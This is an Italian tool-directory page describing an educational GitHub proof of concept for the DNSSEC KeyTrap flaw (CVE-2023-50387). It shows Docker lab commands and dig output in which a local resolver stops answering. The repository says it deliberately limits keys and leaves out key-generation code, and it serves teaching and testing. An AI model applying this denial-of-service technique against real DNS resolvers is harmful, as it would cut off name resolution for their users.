Skip to content
KitploitKITPLOIT
StrumentiBlog
Invia
StrumentiBlog
Invia

Strumenti di Hacking, PenTest e Cybersecurity per il tuo Arsenale di Sicurezza!

Kitploit è una directory di strumenti di hacking, cybersecurity e pentesting. Scopri gli ultimi aggiornamenti dei progetti per trovare vulnerabilità, analizzare sistemi, automatizzare i test e rafforzare la tua sicurezza.

··Feed·Contatto·Privacy·© 2026 Kitploit

Directory degli strumenti

Categorie

Vedi tutte le categorie
Loading categories
CVE-2023-50387 — Proof-of-concept didattico per la vulnerabilità KeyTrap di DNSSEC (CVE-2023-50387) con un ambiente di laboratorio basato su Docker per dimostrare attacchi di complessità algoritmica sui resolver DNS. | Kitploit
Strumenti/GitHubGitHub/knqyf263/cve-2023-50387
Analisi delle VulnerabilitàExploitSicurezza di ReteApprendimento e FormazioneAnalisi DNSLab e Pratica
GitHubknqyf263/cve-2023-50387

CVE-2023-50387

Proof-of-concept didattico per la vulnerabilità KeyTrap di DNSSEC (CVE-2023-50387) con un ambiente di laboratorio basato su Docker per dimostrare attacchi di complessità algoritmica sui resolver DNS.

Vedi Repository
451042 anni faRevisionato da Kitploit

Più Popolari

Vedi tutti →

Scopri gli strumenti più utilizzati dalla nostra community.

Esplora tutti gli strumenti

Sfoglia la nostra collezione di strumenti

Vedi tutti gli strumenti →
Condividi

CVE-2023-50387

KeyTrap nel DNS (CVE-2023-50387)

Questo repository è a scopo didattico. Il numero di chiavi e firme è stato intenzionalmente mantenuto basso per prevenire il loro uso in attacchi reali, e uno script per generare chiavi in collisione non è incluso.

Test

network

Configurazione dell'ambiente PoC

root@kitploit:~
$ docker compose up --build

Verifica del funzionamento di DNSSEC

root@kitploit:~
$ docker compose exec -it attacker dig @10.10.0.3 a.a.test

; <<>> DiG 9.18.24 <<>> @10.10.0.3 a.a.test
; (1 server found)
;; global options: +cmd
;; Got answer:
;; ->>HEADER<<- opcode: QUERY, status: NOERROR, id: 44249
;; flags: qr rd ra ad; QUERY: 1, ANSWER: 1, AUTHORITY: 0, ADDITIONAL: 1

;; OPT PSEUDOSECTION:
; EDNS: version: 0, flags:; udp: 1232
;; QUESTION SECTION:
;a.a.test.                      IN      A

;; ANSWER SECTION:
a.a.test.               86400   IN      A       10.10.0.4

;; Query time: 30 msec
;; SERVER: 10.10.0.3#53(10.10.0.3) (UDP)
;; WHEN: Sun Feb 18 22:01:01 UTC 2024
;; MSG SIZE  rcvd: 53

Attivazione di KeyTrap

root@kitploit:~
$ docker compose exec -it attacker dig @10.10.0.3 www.a.test
;; communications error to 10.10.0.3#53: timed out
;; communications error to 10.10.0.3#53: timed out
;; communications error to 10.10.0.3#53: timed out

; <<>> DiG 9.18.24 <<>> @10.10.0.3 www.a.test
; (1 server found)
;; global options: +cmd
;; no servers could be reached
root@kitploit:~
$ docker compose exec -it attacker dig @10.10.0.3 b.a.test
;; communications error to 10.10.0.3#53: timed out
;; communications error to 10.10.0.3#53: timed out
;; communications error to 10.10.0.3#53: timed out

; <<>> DiG 9.18.24 <<>> @10.10.0.3 a.a.test
; (1 server found)
;; global options: +cmd
;; no servers could be reached

Riferimenti

  • https://www.athene-center.de/en/keytrap
Scarica lo strumento